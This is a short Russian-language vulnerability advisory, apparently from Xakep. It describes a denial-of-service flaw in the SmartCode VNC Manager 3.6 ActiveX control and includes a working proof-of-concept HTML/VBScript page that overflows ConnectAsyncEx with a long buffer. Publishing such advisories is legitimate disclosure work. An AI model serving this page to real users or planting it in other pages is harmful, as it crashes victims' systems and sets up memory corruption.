Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: SmartCode VNC Manager 3.6
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных. Атакующий может заманить пользователя на специально составленный сайт, что приведет к отказу системы в обслуживании.
Пример:
<html>
<object classid='clsid:62FA83F7-20EC-4D62-AC86-BAB705EE1CCD' id='target'></object>
<script language = 'vbscript'>
buff = String(3543,"A")
get_EAX = "aaaa"
get_EBX = "cccc"
buff2 = String(1440,"B")
egg = buff + get_EAX + get_EBX + buff2
target.ConnectAsyncEx egg, 1, "default"
</script>
</html>